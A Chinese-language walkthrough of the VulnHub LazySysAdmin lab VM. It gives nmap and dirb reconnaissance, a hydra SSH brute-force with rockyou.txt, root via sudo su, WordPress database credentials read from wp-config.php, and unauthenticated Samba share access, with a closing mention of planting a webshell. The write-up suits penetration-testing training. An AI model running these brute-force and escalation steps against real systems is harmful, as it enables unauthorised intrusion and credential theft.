信息收集:
靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip
(1)ip扫描
nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:7B:63:B7'
![](https://img-blog.csdnimg.cn/img_convert/385eac9196d8b63d4f556007d2769b44.png)
(2)端口扫描
nmap -p- -A 192.168.254.147
![](https://img-blog.csdnimg.cn/img_convert/10c093038ae44b284ea413c93f25f622.png)
(3)目录扫描
dirb http://192.168.254.147
![](https://img-blog.csdnimg.cn/img_convert/2f168dc666fb23f4ad228dfbea623d13.png)
(4)访问页面,拼接/robots.txt
![](https://img-blog.csdnimg.cn/img_convert/b0682bc3b66e642c4c06242fafdb7477.png)
(5)依次拼接,/Backnode_files下发现一些js文件,大概翻了翻,没啥发现
![](https://img-blog.csdnimg.cn/img_convert/7460279b83e43774be53e16db9d2aba1.png)
(6)访问/phpmyadmin,尝试弱口令登录,没有成功
![](https://img-blog.csdnimg.cn/img_convert/bbe278c9c8f17a1e5618caa40876a5d5.png)
(7)访问/wordpress,里面反复强调我的名字是 togie
![](https://img-blog.csdnimg.cn/img_convert/27608a50d484c5504eca55a1c23d4b18.png)
getshell:
(1)kali使用hydra工具,爆破ssh密码(用户togie),得到密码12345,(rockyou.txt默认路径在/usr/share/wordlists)
cd /usr/share/wordlists
hydra -l togie -P rockyou.txt ssh://192.168.254.147
![](https://img-blog.csdnimg.cn/img_convert/8b0da0bad80a29fe78de89658cd82571.png)
(2)ssh连接togie,成功连接
ssh togie@192.168.254.147
togie:12345
![](https://img-blog.csdnimg.cn/img_convert/e0af3b296aad3b43cd3165cac7247537.png)
提权:
(1)查看当前权限,显示为all
sudo -l
![](https://img-blog.csdnimg.cn/img_convert/36b34a3d462721124f290fc3d7bab29a.png)
(2)直接sudo su提权,提权成功
sudo su
![](https://img-blog.csdnimg.cn/img_convert/1614b0c66621dc3ed8f54d1b061d1019.png)
其他:
(1)在/var/www/html/wordpress下的wp-config.php中找到wordpress账号密码
cd /var/www/html/wordpress
admin:TogieMYSQL12345^^
![](https://img-blog.csdnimg.cn/img_convert/09874e581267f4e8b5e600856527862f.png)
(2)samba服务漏洞,使用enum4linux扫描一下共享文件,发现可以空账号密码访问
enum4linux 192.168.254.147
![](https://img-blog.csdnimg.cn/img_convert/519c7debd6d30358a684f1c2635bd4f0.png)
(3)共享文件名
![](https://img-blog.csdnimg.cn/img_convert/315b4a6e209339419bd5709fc3be096f.png)
(4)win+r,输入 \\192.168.254.147\share$ 访问共享文件
\\192.168.254.147\share$
![](https://img-blog.csdnimg.cn/img_convert/68f1ade0953fb004187996e34dd9738d.png)
这里可以通过共享文件获取wordpress账号密码,在wordpress后台文件写入一句话getshell